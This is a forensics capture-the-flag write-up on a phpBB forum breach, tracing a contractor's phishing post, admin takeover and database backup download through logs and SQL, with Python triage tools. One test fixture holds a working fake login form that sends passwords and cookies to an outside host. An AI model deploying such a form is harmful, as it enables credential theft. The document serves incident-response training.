An external contractor has accessed the internal forum here at Forela via the Guest Wi-Fi, and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
Misc Info:
IP: 10.10.0.27
Register IP: 10.10.0.78
SID: 041ca559047513ba2267dfc066187582
Credential Stealer: hxxp://10[.]10.0.78/update[.]php
Timeline:
25/04/2023 11:07:39 – First activity in access.log from the contractor's IP
25/04/2023 11:07:47 – Contractor account registered
26/04/2023 10:53:51 – Contractor added to the Administrators group
26/04/2023 11:01:38 – Database backup downloaded
Task 1
What was the username of the external contractor?
The first thing I did was look at the DB structure to get an understanding of the different tables available.
Tables that stand out on a first pass: phpbb_log, phpbb_login_attempts, phpbb_posts, phpbb_users, phpbb_sessions and phpbb_search_results.
To start off, I looked at the phpbb_users table. I had already been through access.log, so I have some idea of what I am looking for, but let's see whether the contractor account can be found from the database alone, without correlating it against the log for now.
Here we can see two accounts registered with contractor[.]net email addresses. The same rows give the registration time (user_regdate, stored as an epoch value), the last post time (user_lastpost_time), the last page visited (user_lastpage) and the IP recorded for the user (user_ip).
Task 2
What IP address did the contractor use to create their account?
From the column name alone it isn't obvious whether user_ip is the IP used to register the account or just the IP of the most recent login (phpBB writes it at registration and keeps per-login addresses in phpbb_sessions.session_ip), so I went to access.log for independent confirmation.
In access.log we can see a POST to /ucp.php?mode=register&sid=a6ef84d1dbe44514d987667afd8cf50, the phpBB registration handler.
The IP making that request is the same one stored in user_ip for the account, which confirms it as the registration IP.
Task 3
What is the post_id of the malicious post that the contractor made?
I switched over to the phpbb_posts table for this one.
This is straightforward, since there is only one post from the IP we are tracking (phpbb_posts stores poster_ip alongside post_text), but the post text is right there too, so I will look at it to understand what is going on.
To make it readable I replaced each > with a > followed by a newline. This is a lazy way of quickly formatting HTML, one tag per line, but together with a change of colour scheme it gives a decently readable file.
So, without diving too deeply yet, this is clearly not a normal forum post. We will submit the post_id and come back to the content later.
Task 4
What is the full URI that the credential stealer sends its data to?
The post contains what looks like a full HTML document. So what bad things can an HTML file do?
My first thought is a malicious script, so let's look for any scripts doing something odd.
I found a function called sethidden that appears to take a token.
We can also see some hidden iframes in here. This looks like a phishing post, but let's keep digging.
For sethidden to run, something has to call it, so let's search the page for any other reference to it.
Here we can see a button whose onclick handler calls sethidden. It appears nowhere else on the page, so that button is the trigger.
Just above it are username and password fields inside a form that POSTs to hxxp://10[.]10.0.78/update[.]php. That fits the phishing-page theory and answers the question: the credential stealer sends its data to that URI.
Side note: if you want to be cheeky and play the CTF game you can just grep the post text for the form's action= attribute, but that's no fun.
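The manual read-through above (find the form target, the credential inputs, the hidden iframes and the handler that fires the form) can be scripted so that every post in phpbb_posts gets the same triage. The following is an added example, not tooling from the write-up, and SAMPLE_POST is a constructed HTML body modelled on what the write-up describes rather than the real post from the Forela dump; the form action is the write-up's URI with the defanging removed so it parses as a URL.

```python
"""Triage a forum post body for phishing indicators: forms that submit
credentials off-site, hidden iframes and inline event handlers.
Added example; SAMPLE_POST is constructed to mirror what the write-up
describes, it is not the real post from the Forela dump."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the malicious post: a fake login form, a
# button wired to sethidden(), and an iframe styled out of view.
SAMPLE_POST = """
<div class="login-box">
  <form method="post" action="http://10.10.0.78/update.php" id="lf">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="hidden" name="token" id="token" value="">
    <button type="button" onclick="sethidden()">Login</button>
  </form>
  <iframe src="/viewforum.php?f=2" style="display:none;width:0;height:0"></iframe>
  <script>
    function sethidden(){document.getElementById('token').value=document.cookie;
                         document.getElementById('lf').submit();}
  </script>
</div>
"""


class PostTriage(HTMLParser):
    """Collect form targets, credential inputs, hidden frames and on* handlers."""

    def __init__(self):
        super().__init__()
        self.form_actions = []       # (action, method) for every <form>
        self.credential_inputs = []  # (type, name) for password/username inputs
        self.hidden_iframes = []     # src of iframes styled to be invisible
        self.event_handlers = []     # (tag, attribute, javascript)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "form":
            self.form_actions.append((a.get("action") or "", (a.get("method") or "get").lower()))
        elif tag == "input":
            itype = (a.get("type") or "text").lower()
            name = (a.get("name") or "").lower()
            if itype == "password" or name in ("username", "user", "login", "email"):
                self.credential_inputs.append((itype, name))
        elif tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            if "hidden" in a or "display:none" in style or "height:0" in style:
                self.hidden_iframes.append(a.get("src") or "")
        for attr, value in attrs:
            if attr.lower().startswith("on"):  # onclick, onload, ...
                self.event_handlers.append((tag, attr.lower(), value or ""))


def triage_post(post_text):
    """Return the indicators found in one post body."""
    parser = PostTriage()
    # phpBB may store entity-escaped markup; unescape is a no-op on raw HTML.
    parser.feed(html.unescape(post_text))
    parser.close()
    return {
        "form_actions": parser.form_actions,
        "credential_inputs": parser.credential_inputs,
        "hidden_iframes": parser.hidden_iframes,
        "event_handlers": parser.event_handlers,
    }


def exfil_targets(post_text, forum_host):
    """Form actions that send data to a host other than the forum itself."""
    hits = []
    for action, _method in triage_post(post_text)["form_actions"]:
        host = urlparse(action).hostname
        if host and host != forum_host:
            hits.append(action)
    return hits
```

Run triage_post over every post_text row and flag anything where exfil_targets is non-empty; a credential form whose action points off the forum host is the single strongest indicator here, and the hidden iframe and onclick handler are supporting evidence rather than proof on their own.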
Task 5
When did the contractor log into the forum as the administrator? (UTC)
I found this in access.log by filtering for admin activity (requests to the Administration Control Panel under /adm/) from the malicious IP.
The log timestamps carry a +0100 offset, so subtract an hour from the displayed time to get UTC.
Task 6
In the forum there are plaintext credentials for the LDAP connection, what is the password?
phpbb_config is a plain key/value table (config_name, config_value). I opened it and scrolled through until a key that looked like a password field turned up: ldap_password.
Passw0rd1
Task 7
What is the user agent of the Administrator user?
For this one I looked up the admin user's IP in phpbb_users and then searched access.log for requests from that address.
Here we can see the user agent used by that account:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Task 8
What time did the contractor add themselves to the Administrator group? (UTC)
phpbb_log records group membership changes under the LOG_USERS_ADDED log_operation, so we can look there for the contractor being added to Administrators.
log_time is an epoch timestamp, so it just needs converting.
Ref: https://www.epochconverter.com/
April 26, 2023 10:53:51 AM
26/04/2023 10:53:51
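Tasks 1, 2, 6 and 8 above are all answered by reading tables in the SQLite dump by hand. The block below is an added example, not part of the write-up, that runs the same lookups as queries: external-domain accounts with their registration IP and UTC time, config keys that hold secrets, and LOG_USERS_ADDED entries joined to the acting account. It builds its own in-memory database from constructed rows; the usernames, the forela.example domain, 192.0.2.10 and the placeholder config values are invented, while 10.10.0.78, Passw0rd1 and the 1682506431 log time are the write-up's values. Against the real dump, replace build_db() with sqlite3.connect() on the file.

```python
"""Query a phpBB SQLite dump for the artefacts the write-up pulls out by
hand: accounts on an external mail domain with their registration IP and
UTC time, credential-bearing config keys, and Administrators-group changes
from phpbb_log. Added example; the database is built in memory from
constructed rows, not loaded from the Forela dump."""
import sqlite3
from datetime import datetime, timezone

# Only the columns the queries need; the real tables have many more.
SCHEMA = """
CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_email TEXT,
                          user_ip TEXT, user_regdate INTEGER, user_lastpage TEXT);
CREATE TABLE phpbb_config (config_name TEXT, config_value TEXT);
CREATE TABLE phpbb_log (log_id INTEGER, log_operation TEXT, user_id INTEGER,
                        log_ip TEXT, log_time INTEGER, log_data TEXT);
"""

# Constructed rows. Usernames, the forela.example domain, 192.0.2.10 and the
# placeholder config values are invented; 10.10.0.78, Passw0rd1 and the
# 1682506431 (26/04/2023 10:53:51 UTC) log time are the write-up's values.
ROWS = {
    "phpbb_users": [
        (2, "admin", "admin@forela.example", "192.0.2.10", 1672531200, "/adm/index.php"),
        (50, "contractor_a", "a@contractor.net", "10.10.0.78", 1682420867, "/ucp.php?mode=login"),
        (51, "contractor_b", "b@contractor.net", "10.10.0.78", 1682420900, "/index.php"),
    ],
    "phpbb_config": [
        ("sitename", "Forela Forum"),
        ("ldap_server", "ldap.forela.example"),
        ("ldap_user", "cn=forum,dc=forela,dc=example"),
        ("ldap_password", "Passw0rd1"),
        ("smtp_password", ""),
    ],
    "phpbb_log": [
        # The contractor acted while logged in AS the admin account, so the
        # acting user_id is the admin's; log_ip still records the real source.
        (1, "LOG_ADMIN_AUTH_SUCCESS", 2, "10.10.0.78", 1682506270, ""),
        (2, "LOG_USERS_ADDED", 2, "10.10.0.78", 1682506431, "Administrators:contractor_a"),
    ],
}


def utc(epoch):
    """Epoch seconds to the dd/mm/yyyy HH:MM:SS UTC form used in the write-up."""
    return datetime.fromtimestamp(int(epoch), tz=timezone.utc).strftime("%d/%m/%Y %H:%M:%S")


def build_db():
    """In-memory stand-in for the dump; swap for sqlite3.connect('forum.sqlite3')."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({marks})", rows)
    return conn


def external_accounts(conn, internal_domain):
    """Users whose e-mail is not on the company domain, oldest registration first."""
    sql = """SELECT username, user_email, user_ip, user_regdate, user_lastpage
             FROM phpbb_users
             WHERE lower(user_email) NOT LIKE '%@' || lower(?)
             ORDER BY user_regdate"""
    return [(name, mail, ip, utc(reg), page)
            for name, mail, ip, reg, page in conn.execute(sql, (internal_domain,))]


def credential_config(conn):
    """config_name/config_value pairs whose key looks like a secret."""
    sql = """SELECT config_name, config_value FROM phpbb_config
             WHERE config_name LIKE '%pass%' OR config_name LIKE '%secret%'"""
    return dict(conn.execute(sql).fetchall())


def admin_group_changes(conn):
    """LOG_USERS_ADDED entries with the acting account, source IP and UTC time."""
    sql = """SELECT l.log_time, u.username, l.log_ip, l.log_data
             FROM phpbb_log l JOIN phpbb_users u ON u.user_id = l.user_id
             WHERE l.log_operation = 'LOG_USERS_ADDED'
             ORDER BY l.log_time"""
    return [(utc(t), who, ip, data) for t, who, ip, data in conn.execute(sql)]
```

The join in admin_group_changes is the point worth noticing: because the contractor performed the group change from a session authenticated as the administrator, user_id on that log row is the admin's, and it is log_ip that ties the action back to the contractor's address.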
Task 9
What time did the contractor download the database backup? (UTC)
Back in access.log there is a GET for /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz at 26/Apr/2023:12:01:38 +0100. Note that the number embedded in the filename is the epoch time the backup was generated (1682506471, i.e. 26/04/2023 10:54:31 UTC, forty seconds after the group change); the log line is when it was downloaded.
Again we just need to adjust the log time to UTC, so minus one hour.
26/04/2023 11:01:38
Task 10
What was the size in bytes of the database backup as stated by access.log?
That is in the same log line we just looked at: the response size field reads 34707.
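Tasks 2, 5, 7, 9 and 10 all come down to reading access.log and converting the +0100 timestamps to UTC by hand. The following is an added example, not tooling from the write-up, that parses Apache combined-format lines and answers each of those questions as a function. SAMPLE_LOG is constructed: the backup GET reproduces the line quoted above (with the 34707 byte size), the Mac user agent is the one found in Task 7, and everything else, including 192.0.2.10 for the admin's own workstation, the contractor's user agent and the ACP request time, is a placeholder.

```python
"""Pull the access.log answers the write-up reads by eye: the registration
POST and its source IP, the first ACP (/adm/) request from the suspect IP,
backup downloads with their sizes, and user agents per IP, with the log's
+0100 offset normalised to UTC. Added example; the log lines are
constructed (the backup GET copies the line quoted in the write-up, the
others are placeholders)."""
import re
from datetime import datetime, timezone

# Apache combined log format, with the request line split into its parts.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

UA_MAC = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36")
UA_OTHER = "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0"

# Constructed sample. 192.0.2.10 stands in for the admin's own workstation;
# the contractor's UA and the ACP request time are placeholders.
SAMPLE_LOG = f"""\
10.10.0.78 - - [25/Apr/2023:12:07:39 +0100] "GET /index.php HTTP/1.1" 200 11021 "-" "{UA_OTHER}"
10.10.0.78 - - [25/Apr/2023:12:07:47 +0100] "POST /ucp.php?mode=register&sid=a6ef84d1dbe44514d987667afd8cf50 HTTP/1.1" 302 0 "-" "{UA_OTHER}"
192.0.2.10 - - [26/Apr/2023:11:40:02 +0100] "GET /viewtopic.php?t=12 HTTP/1.1" 200 20432 "-" "{UA_MAC}"
10.10.0.78 - - [26/Apr/2023:11:51:10 +0100] "GET /adm/index.php?sid=041ca559047513ba2267dfc066187582 HTTP/1.1" 200 9876 "-" "{UA_OTHER}"
10.10.0.78 - - [26/Apr/2023:12:01:38 +0100] "GET /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz HTTP/1.1" 200 34707 "-" "{UA_OTHER}"
"""


def parse_log(text):
    """Yield one dict per well-formed line; 'time' is an aware UTC datetime."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole run
        rec = m.groupdict()
        # %z consumes the +0100 offset; astimezone() then moves it to UTC.
        rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
        rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
        yield rec


def fmt(dt):
    """dd/mm/yyyy HH:MM:SS, the form the answers above use."""
    return dt.strftime("%d/%m/%Y %H:%M:%S")


def registration_posts(text):
    """(ip, UTC time) of every POST to the phpBB registration handler."""
    return [(r["ip"], fmt(r["time"])) for r in parse_log(text)
            if r["method"] == "POST" and r["path"].startswith("/ucp.php?mode=register")]


def first_acp_request(text, ip):
    """UTC time and path of the first Administration Control Panel hit from ip."""
    for r in parse_log(text):
        if r["ip"] == ip and r["path"].startswith("/adm/"):
            return fmt(r["time"]), r["path"]
    return None


def backup_downloads(text):
    """Fetches of phpBB database backups from /store/, with UTC time and size."""
    return [(r["ip"], fmt(r["time"]), r["path"], r["size"]) for r in parse_log(text)
            if r["path"].startswith("/store/backup_")]


def backup_created_utc(path):
    """phpBB names backups backup_<epoch>_<random>; recover the creation time."""
    m = re.search(r"backup_(\d{10})_", path)
    return fmt(datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)) if m else None


def user_agents(text, ip):
    """Distinct user agents seen from one IP."""
    return sorted({r["ua"] for r in parse_log(text) if r["ip"] == ip})
```

Parsing the offset with %z rather than subtracting a fixed hour is deliberate: a log that spans a daylight-saving change carries both +0000 and +0100 lines, and a hard-coded correction would silently shift half of them.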